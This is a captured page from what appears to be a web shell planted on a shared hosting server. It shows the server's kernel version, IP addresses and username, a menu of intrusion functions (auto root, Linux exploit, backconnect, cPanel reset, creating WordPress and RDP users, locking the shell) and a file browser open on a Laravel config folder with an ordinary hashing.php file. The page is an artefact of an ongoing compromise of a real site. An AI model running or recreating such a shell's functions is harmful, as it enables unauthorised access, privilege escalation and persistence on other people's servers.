Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
joselito /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
8.38
KB
-rw-r--r--
auth.php
3.51
KB
-rw-r--r--
broadcasting.php
1.57
KB
-rw-r--r--
cache.php
2.62
KB
-rw-r--r--
cors.php
1.57
KB
-rw-r--r--
database.php
3.86
KB
-rw-r--r--
filesystems.php
2.08
KB
-rw-r--r--
hashing.php
1.52
KB
-rw-r--r--
logging.php
2.17
KB
-rw-r--r--
mail.php
4.12
KB
-rw-r--r--
queue.php
2.55
KB
-rw-r--r--
services.php
999
B
-rw-r--r--
session.php
6.71
KB
-rw-r--r--
view.php
1004
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hashing.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Hash Driver |-------------------------------------------------------------------------- | | This option controls the default hash driver that will be used to hash | passwords for your application. By default, the bcrypt algorithm is | used; however, you remain free to modify this option if you wish. | | Supported: "bcrypt", "argon" | */ 'driver' => 'bcrypt', /* |-------------------------------------------------------------------------- | Bcrypt Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Bcrypt algorithm. This will allow you | to control the amount of time it takes to hash the given password. | */ 'bcrypt' => [ 'rounds' => env('BCRYPT_ROUNDS', 10), ], /* |-------------------------------------------------------------------------- | Argon Options |-------------------------------------------------------------------------- | | Here you may specify the configuration options that should be used when | passwords are hashed using the Argon algorithm. These will allow you | to control the amount of time it takes to hash the given password. | */ 'argon' => [ 'memory' => 1024, 'threads' => 2, 'time' => 2, ], ];
Close